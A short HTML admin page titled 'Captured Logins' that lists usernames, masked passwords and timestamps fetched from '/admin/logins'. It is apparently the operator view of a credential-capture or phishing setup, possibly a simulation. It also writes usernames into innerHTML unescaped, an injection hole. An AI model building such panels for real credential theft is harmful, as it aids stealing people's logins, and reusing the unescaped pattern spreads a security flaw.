<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1">
<title>Admin – Captured Logins</title>
<style>
  body { font-family: sans-serif; padding: 2rem; }
  table { width: 100%; border-collapse: collapse; }
  th, td { padding: 0.5rem; border: 1px solid #ddd; text-align: left; }
  th { background: #f4f4f4; }
</style>
</head>
<body>
  <h1>Captured Logins</h1>
  <table id="logintable">
    <thead>
      <tr><th>Username</th><th>Password</th><th>Time</th></tr>
    </thead>
    <tbody></tbody>
  </table>
  <script>
    fetch('/admin/logins').then(r => r.json()).then(data => {
      const tbody = document.querySelector('#logintable tbody');
      data.forEach(e => {
        const tr = document.createElement('tr');
        tr.innerHTML = `<td>${e.username}</td><td>${e.password.replace(/./g,'•')}</td><td>${new Date(e.timestamp).toLocaleString()}</td>`;
        tbody.appendChild(tr);
      });
    });
  </script>
</body>
</html>